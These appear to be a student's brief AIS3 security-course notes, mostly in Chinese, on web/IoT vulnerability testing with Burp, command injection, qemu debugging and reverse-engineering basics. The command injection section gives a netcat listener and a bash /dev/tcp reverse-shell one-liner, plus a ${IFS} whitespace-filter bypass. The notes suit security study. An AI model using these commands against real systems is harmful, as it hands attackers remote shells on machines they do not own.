AIS3 180801 === ###### tags: `AIS3` `筆記` ## IOT\Web Vuln ### Local Proxy - Burp ### Command Injection - 彈回shell ```shell # Open a port to listen nc -vv -l 8080 # Get Remote Shell bash -i >& /dev/tcp/87.87.87.87/8080 0>&1 ``` Ref http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet #### 組合技 1. 先讓 app/browser 連上自己架的 Proxy (Burp) 2. 用 Burp 攔截封包, 亂改參數 3. 測試 Command Injection 4. 好爽 ### Bypass - WhiteSpace: ${IFS} (Bash Internal Field Separator) ### ??? - qemu-master - MIPS ```shell sudo chroot . [chroot path] -g [port] [program name] # 即可用 IDA Pro 遠端 Debug ``` ## 逆向工程 > 'Cyber Attack' -- Asuka Nakajima ### Register - Segment Register (ss, cs, ds, es, fs, gs) - SSE, MMX, FPU, debug ### Calling Convention 1. stdcall - Win32API - Callee cleans the stack(msvc) 2. thiscall 3. fastcall